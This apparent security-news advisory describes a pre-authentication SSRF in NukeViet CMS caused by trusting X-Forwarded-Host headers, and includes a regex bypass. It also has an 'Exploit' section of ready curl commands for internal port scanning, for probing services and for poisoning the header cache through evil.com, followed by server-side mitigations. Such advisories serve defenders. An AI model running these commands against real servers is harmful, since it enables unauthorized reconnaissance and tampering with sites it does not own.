Listen to this Post
An unauthenticated attacker can coerce the server into issuing HTTP requests to an attacker-chosen host by spoofing the `X-Forwarded-Host` and `X-Forwarded-Proto` request headers. The forwarded host is used, without validation, to build the URL that `server_info_update()` fetches with cURL, resulting in a Server-Side Request Forgery (SSRF) that requires no authentication.
The vulnerability exists because the `NukeViet\Core\Server` class derives `original_host` and `original_protocol` from the `X-Forwarded-Host` and `X-Forwarded-Proto` headers and exposes them via `getOriginalHost()` and getOriginalProtocol(). These values are attacker-controlled and are not validated against the site’s configured domains (my_domains).
In server_info_update(), the tainted host and scheme are concatenated directly into a cURL URL:
$proto = $nv_Server->getOriginalProtocol(); // from X-Forwarded-Proto $host = $nv_Server->getOriginalHost(); // from X-Forwarded-Host $ch = curl_init($proto . '://' . $host . NV_BASE_SITEURL . 'index.php?response_headers_detect=1'); curl_exec($ch);
Two factors make this reliably reachable:
- The `__serverInfoUpdate` handler runs very early in
includes/ini.php, before authentication, so the sink is reachable pre-auth. - The host sanitizer `standardizeHost()` stripped a trailing port only with the regex
(\:[0-9]+)$, which is bypassed by appending a slash (e.g.,127.0.0.1:8081/): the string no longer ends in:digits, so the port survives and an arbitrary `host:port` reaches the cURL call.
The SSRF is blind, HEAD-only, and uses a fixed request path (…/index.php?response_headers_detect=1). The fetched response is stored server-side in the `config_ini` cache and is not reflected to the attacker. Because the path is fixed and not attacker-controlled, cloud metadata endpoints (e.g.,169.254.169.254/latest/meta-data/...) cannot be reached, and `gopher://` / `dict://` request smuggling cannot inject arbitrary payloads. What an attacker can do: unauthenticated internal host/port discovery (connection success/timing, with the port reachable through the regex bypass), and poisoning of the cached `server_headers` (the SSRF target’s response headers are stored and applied to the site).
DailyCVE Form
Platform: NukeViet CMS
Version: < 4.6.00
Vulnerability: Pre-auth SSRF
Severity: High (7.2 CVSS)
Date: 2026-07-13
Prediction: Patch expected 4.6.00
What Undercode Say
Analytics:
Check NukeViet version grep "NV_VERSION" includes/constants.php Check if my_domains is configured grep "my_domains" includes/config.php Test for SSRF vulnerability curl -X POST http://<victim>/index.php \ -H "X-Forwarded-Proto: http" \ -H "X-Forwarded-Host: <attacker-controlled-host>:<port>/" \ -d "__serverInfoUpdate=1"
Exploit:
1. Port scan internal hosts via timing
for port in 80 443 8080 8443 3306 5432 6379; do
time curl -s -o /dev/null -X POST http://<victim>/index.php \
-H "X-Forwarded-Proto: http" \
-H "X-Forwarded-Host: 127.0.0.1:${port}/" \
-d "__serverInfoUpdate=1"
done
2. Test for internal service reachability
curl -X POST http://<victim>/index.php \
-H "X-Forwarded-Proto: http" \
-H "X-Forwarded-Host: 192.168.1.1:8080/" \
-d "__serverInfoUpdate=1"
3. Poison server_headers cache
curl -X POST http://<victim>/index.php \
-H "X-Forwarded-Proto: https" \
-H "X-Forwarded-Host: evil.com/" \
-d "__serverInfoUpdate=1"
Protection:
Apache: Strip X-Forwarded- headers <IfModule mod_headers.c> RequestHeader unset X-Forwarded-Host RequestHeader unset X-Forwarded-Proto RequestHeader unset X-Forwarded-Port </IfModule> Nginx: Override X-Forwarded- headers proxy_set_header X-Forwarded-Host $host; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header X-Forwarded-Port $server_port; Validate my_domains in config.php $global_config['my_domains'] = ['example.com', 'www.example.com'];
Impact:
- Unauthenticated internal host/port discovery
- Poisoning of cached `server_headers`
– No data exfiltration, cloud credential theft, or internal RCE
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

